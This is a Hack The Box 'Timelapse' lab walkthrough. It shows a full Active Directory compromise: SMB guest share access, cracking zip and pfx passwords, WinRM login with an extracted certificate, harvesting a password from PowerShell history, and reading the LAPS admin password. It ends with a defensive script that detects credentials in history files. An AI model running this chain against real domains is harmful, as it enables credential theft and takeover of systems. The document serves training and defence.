Timelapse
March 15, 2025
Created by: ctrlzero
Page: Hack The Box
Difficulty: Easy
OS: Windows

I start with a scan of the open ports and then scan the versions and technologies running on the open ports I found.

nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.152 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49695,49727 -sCV -Pn 10.10.11.152 -oN ports

I found the domains dc01.timelapse.htb and timelapse.htb and added them to the hosts file.

I begin by listing the resources shared over SMB using null credentials. This shows that I have read permission on the "Shares" folder. Inside it I find a zip file. I download it and see that it requires a password to extract its contents.

netexec smb 10.10.11.152 -u Guest -p "" --shares
smbclient -U 'Guest' //10.10.11.152/Shares

I extract the hash and with john I get the password to extract the files.

zip2john winrm_backup.zip > ziphash
john -w=/usr/share/wordlists/rockyou.txt ziphash

I manage to extract a .pfx file that is password protected. I extract the hash and, again with john, I recover the password of the file.

pfx2john legacyy_dev_auth.pfx > hashpfx
john -w=/usr/share/wordlists/rockyou.txt hashpfx

At this point I can extract the certificate and the private key from the PKCS#12 container.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

With these files I can connect to the system via WinRM. I get access and read the first flag.

evil-winrm -i 10.10.11.152 -c cert.pem -k key.pem -S -r timelapse.htb

I enumerate the domain with SharpHound and then look for potential privilege escalation paths in BloodHound. I collect the information but I don't observe anything relevant.

.\SharpHound.exe -c All --zipfilename info

I decide to check the history of executed PowerShell commands, and inside it I find the credentials of the user svc_deploy. I validate them with netexec and confirm that they are correct.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

In the first part of the reconnaissance we saw that the system has port 5986 open, so we can connect to it through WinRM, indicating that we want to use SSL.

evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3XXXXXXXXXXXXXXXXXuaV'

Once inside the system we check the information related to this user and observe that it belongs to the group LAPS_Readers. "Local Administrator Password Solution" (LAPS) is used to manage the local administrator passwords of domain computers, and members of this group can read them, so we can retrieve the administrator password. To recover it we query the Active Directory computer object.

info <active-directory-computer-name> => (Get-ADComputer -Identity $env:COMPUTERNAME).Name
#Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'
Get-ADComputer -Identity 'DC01' -property 'ms-mcs-admpwd'

Another way to extract the LAPS password would be through netexec.

netexec smb 10.10.11.152 -u svc_deploy -p 'E3XXXXXXXXXXXXXXXXXuaV' --laps Administrator

Having the password we can connect to the system as administrator and read the second flag.

evil-winrm -S -i 10.10.11.152 -u administrator -p '6JXXXXXXXXXXXp5'
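The svc_deploy foothold came from a plaintext password left in a PSReadline ConsoleHost_history.txt. The following added script (my own example, not part of this writeup or of any Hack The Box material) is the defender-side check for that exposure: it walks the per-user history files under the path used above, flags lines that embed credentials or touch the LAPS attribute, and redacts the secret in its report. The sample history and the pattern set are my own constructions; tune the patterns to your environment.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed sample of a ConsoleHost_history.txt; values are made up, not the box's.
SAMPLE_HISTORY = """\
whoami
ls C:\\Users
$p = ConvertTo-SecureString 'Sup3rS3cret!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential('svc_deploy', $p)
invoke-command -computername localhost -credential $c -ScriptBlock {whoami}
Get-ADComputer -Identity 'DC01' -property 'ms-mcs-admpwd'
net user backup P@ssw0rd123 /add
Get-Date
"""

# Each rule that can capture a secret names it <secret> so it can be masked in the report.
PATTERNS = {
    "plaintext SecureString": re.compile(r"ConvertTo-SecureString\s+['\"]?(?P<secret>[^'\"\s]+)", re.I),
    "net user with password": re.compile(r"net\s+user\s+\S+\s+(?P<secret>\S+)", re.I),
    "password switch": re.compile(r"(?:\s-p\s+|\s-password\s+|/password:)['\"]?(?P<secret>[^'\"\s]+)", re.I),
    "LAPS attribute read": re.compile(r"ms-mcs-admpwd", re.I),
}

# Relative to a user's profile directory, the same path the walkthrough reads.
HISTORY_REL = Path("AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt")


def scan_history(text: str, source: str = "ConsoleHost_history.txt") -> List[Dict[str, object]]:
    """Return one finding per matching line; any captured secret is replaced by <redacted>."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            shown = line
            secret = m.groupdict().get("secret")
            if secret:
                shown = line.replace(secret, "<redacted>")
            findings.append({"source": source, "line": lineno, "rule": rule, "text": shown})
            break  # one finding per line is enough for triage
    return findings


def scan_profiles(users_root: str = r"C:\Users") -> List[Dict[str, object]]:
    """Scan every user's PSReadline history under users_root (run as an admin on the host)."""
    results = []
    for hist in Path(users_root).glob(str(Path("*") / HISTORY_REL)):
        results.extend(scan_history(hist.read_text(errors="replace"), str(hist)))
    return results


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{f['source']}:{f['line']} [{f['rule']}] {f['text']}")
```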